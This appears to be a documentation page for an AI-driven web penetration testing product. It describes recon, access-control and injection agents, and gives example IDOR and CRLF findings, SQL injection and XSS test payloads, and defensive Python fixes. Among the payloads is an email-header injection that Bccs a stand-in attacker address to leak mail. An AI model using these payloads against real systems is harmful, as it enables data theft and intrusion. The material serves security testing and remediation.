ModernPentest
AI Agents

Web Testing Agents

AI agents specialized for testing web applications

Agent Overview

Agent | Focus Area | OWASP Specialization
Recon Agent | Discovery & mapping | Foundation for all testing
Access Control Agent | Authorization testing | A01 - Broken Access Control
Injection Agent | Input validation | A03 - Injection

Recon Agent

The Reconnaissance Agent is the foundation of every pentest. It maps your application to enable effective testing.

What It Does

  • Endpoint Discovery - Finds all accessible pages and routes
  • Technology Detection - Identifies frameworks, libraries, versions
  • Authentication Mapping - Understands login flows and session handling
  • Input Identification - Locates forms, parameters, and entry points
  • Architecture Understanding - Recognizes admin areas, user sections, APIs

How It Works

The Recon Agent takes your application URL and produces a comprehensive Application Map:

  • Endpoints — All discovered pages and routes (typically 20-100+)
  • Technologies — Frameworks, libraries, and versions detected
  • Authentication flows — Login mechanisms and session handling
  • Forms and parameters — All user input points
  • Testing plan — Prioritized targets for other agents

Output

The Recon Agent produces a comprehensive map used by all other agents:

  • List of endpoints to test
  • Technology-specific considerations
  • Authentication tokens and flows
  • Priority targets based on risk

Access Control Agent

Tests for authorization vulnerabilities—the #1 most common web application security risk.

What It Tests

OWASP A01 - Broken Access Control (34% of applications)

Vulnerability | Description
IDOR | Accessing other users' data via predictable references
Horizontal Privilege Escalation | User A accessing User B's resources
Vertical Privilege Escalation | Regular user accessing admin functions
Forced Browsing | Accessing unauthorized pages directly
Missing Authorization | Endpoints without access checks

Testing Methodology

  1. Identify Object References - Find IDs, UUIDs, and other references
  2. Baseline Collection - Document legitimate access patterns
  3. Cross-User Testing - Attempt access with different credentials
  4. Privilege Testing - Try escalating to higher permission levels
  5. Authorization Bypass - Test various bypass techniques

Example Finding

❌ Critical: Unauthorized Cross-Organization Domain Deletion (IDOR)

Endpoint: DELETE /api/domains/:id
Parameter: id
CWE: CWE-639 (Authorization Bypass Through User-Controlled Key)
OWASP: A01:2021-Broken Access Control

Issue: The DELETE endpoint does not verify the authenticated user
       owns the domain or belongs to the same organization.

Evidence - Authorization Comparison:
-  GET /api/domains/:id  → 403 Forbidden (Protected ✓)
-  DELETE /api/domains/:id → 200 OK (VULNERABLE ✗)

Exploitation Proof:
- Attacker: bob@acme.com (Org: ACME Corp)
- Victim: admin@techstart.com (Org: TechStart Inc)
- Result: Attacker successfully deleted victim's domain
- Verification: GET by victim returned {"error":"Domain not found"}

Impact:
- Multi-tenant isolation breach
- Cross-organization data deletion
- Service disruption for victims
- Compliance violations (GDPR/CCPA)
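
The remediation for a finding like this is to route every verb on the resource through one ownership check, then keep a regression check that repeats the GET/DELETE comparison from the evidence. The following is an added example, not ModernPentest's code or the tested application's; the in-memory store, the domain IDs and all function names are hypothetical.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class User:
    email: str
    org: str

BOB = User("bob@acme.com", "ACME Corp")

def make_store():
    # Constructed sample data: domain id -> owning organization.
    return {"d-100": "ACME Corp", "d-200": "TechStart Inc"}

def authorize(store, user, domain_id):
    """Single ownership check shared by every verb; returns an HTTP status."""
    owner = store.get(domain_id)
    if owner is None:
        return 404
    return 200 if owner == user.org else 403

def get_domain(store, user, domain_id):
    return authorize(store, user, domain_id)

def delete_domain_vulnerable(store, user, domain_id):
    # Behaviour described in the finding: authenticated caller, no ownership check.
    if domain_id not in store:
        return 404
    del store[domain_id]
    return 200

def delete_domain_fixed(store, user, domain_id):
    status = authorize(store, user, domain_id)
    if status == 200:
        del store[domain_id]
    return status

def cross_org_check(delete_handler, caller=BOB, target="d-200"):
    """Call each verb as a user from another organization and record the outcome."""
    store = make_store()
    return {
        "GET": get_domain(store, caller, target),
        "DELETE": delete_handler(store, caller, target),
        "target_survives": target in store,
    }

if __name__ == "__main__":
    print(cross_org_check(delete_domain_vulnerable))
    print(cross_org_check(delete_domain_fixed))
```

Any verb that returns a success status for a caller from another organization while its siblings return 403 is the inconsistency the finding reports.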

Injection Agent

Tests for injection vulnerabilities—malicious data sent to interpreters.

What It Tests

OWASP A03 - Injection (18% of applications)

Vulnerability | Description
SQL Injection | Database query manipulation
Cross-Site Scripting (XSS) | Script injection into web pages
Command Injection | OS command execution
Server-Side Template Injection | Template engine exploitation
NoSQL Injection | Document database manipulation
XML External Entity (XXE) | XML parser exploitation

Testing Methodology

For each input parameter discovered by Recon:

  1. Identify injection points - Forms, URL params, headers, JSON
  2. Determine context - SQL, HTML, OS command, template
  3. Send test payloads - Technology-appropriate inputs
  4. Analyze responses - Errors, behavior changes, timing
  5. Validate findings - Confirm exploitability

SQL Injection Testing

Input: search?q=test

Test payloads:
- test'           → SQL error indicates vulnerability
- test' OR '1'='1 → Behavior change indicates vulnerability
- test'; WAITFOR DELAY '0:0:5'-- → Time delay indicates blind SQLi
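
Why the first two payloads produce those signals, and why a bound parameter removes them, shown as an added example that is not ModernPentest's code. The SQLite table, its rows and the function names are constructed for illustration; the time-delay payload is omitted because WAITFOR is not SQLite syntax.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the table behind search?q=...
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (name TEXT)")
    db.executemany("INSERT INTO items VALUES (?)",
                   [("test",), ("payroll",), ("roadmap",)])
    return db

def search_concat(db, q):
    """Vulnerable: q is spliced into the SQL text, so a quote changes the query."""
    sql = f"SELECT name FROM items WHERE name = '{q}'"
    return [row[0] for row in db.execute(sql)]

def search_param(db, q):
    """Hardened: q is bound as data and never parsed as SQL."""
    sql = "SELECT name FROM items WHERE name = ?"
    return [row[0] for row in db.execute(sql, (q,))]

def signal(search, q, baseline="test"):
    """Classify a response the way the 'Analyze responses' step describes."""
    db = make_db()
    expected = search(db, baseline)
    try:
        got = search(db, q)
    except sqlite3.Error:
        return "sql-error"            # database rejected the altered query text
    if len(got) > len(expected):
        return "behavior-change"      # more rows than a legitimate search returns
    return "no-signal"

if __name__ == "__main__":
    for payload in ("test'", "test' OR '1'='1"):
        print(repr(payload), signal(search_concat, payload), signal(search_param, payload))
```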

XSS Testing

Input: comment field

Test payloads (context-aware):
- HTML: <script>alert(1)</script>
- Attribute: " onclick="alert(1)"
- JavaScript: ';alert(1)//

Example Finding

❌ High: CRLF Injection Enables Email Header Manipulation

Endpoint: POST /api/emails
Parameter: subject
CWE: CWE-93 (CRLF Injection)
OWASP: A03:2021-Injection

Issue: The email subject field accepts CRLF characters (\r\n),
       allowing injection of arbitrary email headers.

Payload:
  subject: "Confidential\r\nBcc: attacker@evil.com\r\nReply-To: phishing@evil.com"

Injected Headers Confirmed:
- Bcc: attacker@evil.com (blind copy to attacker)
- Reply-To: phishing@evil.com (redirects replies)
- X-Priority: 1 (marks as urgent)
- Content-Type: text/html; charset=UTF-7

Response:
  {"id":"438356f2-...", "subject":"Confidential\r\nBcc: attacker@evil.com...", "status":"sent"}

Persistence: CRLF characters stored in database and returned in GET responses

Impact:
- Leak confidential emails via Bcc injection
- Phishing attacks via Reply-To manipulation
- Bypass email security filters
- Affects all users sending through the platform
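
The mechanism behind this finding and the input check that closes it, as an added example that is not ModernPentest's code or the affected platform's. The function names, the recipient address and the 255-character limit are assumptions; the payload is the one quoted in the finding.

```python
import re
from email import message_from_string

# CR, LF and the other characters that line splitters treat as a line break.
_LINE_BREAKS = re.compile(r"[\r\n\x0b\x0c\x1c\x1d\x1e\x85\u2028\u2029]")

PAYLOAD = "Confidential\r\nBcc: attacker@evil.com\r\nReply-To: phishing@evil.com"

def build_raw_naive(to_addr, subject, body):
    """Header block built by concatenation: the subject is written verbatim."""
    return f"To: {to_addr}\r\nSubject: {subject}\r\n\r\n{body}"

def validate_subject(subject, max_len=255):
    """Reject a subject that could end the Subject header line early.

    Run this at the API boundary, before the value is stored, since the
    finding notes the CRLF characters persisted in the database.
    max_len is an assumed limit, not one taken from the page.
    """
    if not isinstance(subject, str) or not subject.strip():
        raise ValueError("subject must be a non-empty string")
    if len(subject) > max_len:
        raise ValueError("subject too long")
    if _LINE_BREAKS.search(subject):
        raise ValueError("subject contains a line-break character")
    return subject

def build_raw_checked(to_addr, subject, body):
    return build_raw_naive(to_addr, validate_subject(subject), body)

def header_names(raw):
    """Header field names a receiving mail parser extracts from the message."""
    return [name for name, _ in message_from_string(raw).items()]

if __name__ == "__main__":
    print(header_names(build_raw_naive("user@example.com", PAYLOAD, "hi")))
    try:
        build_raw_checked("user@example.com", PAYLOAD, "hi")
    except ValueError as exc:
        print("rejected:", exc)
```

The same check applies to any user-supplied value that ends up in a header line, not only the subject.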

Parallel Execution

After Recon completes, specialized agents run simultaneously on different endpoint groups:

Agent | Target Endpoints | Focus
Access Control Agent | /users/*, /orders/*, /admin/* | Authorization bypass, IDOR
Injection Agent | /search, /api/*, forms | SQL injection, XSS, command injection

All findings then flow into the Consolidation phase for deduplication and validation.

Findings Consolidation

After all agents complete:

  1. Deduplication - Same vulnerability found by multiple agents? Merged.
  2. Validation - Each finding confirmed for accuracy
  3. Severity Assessment - Real-world risk evaluated
  4. Remediation - Fix guidance tailored to your stack


Last updated: February 1, 2026
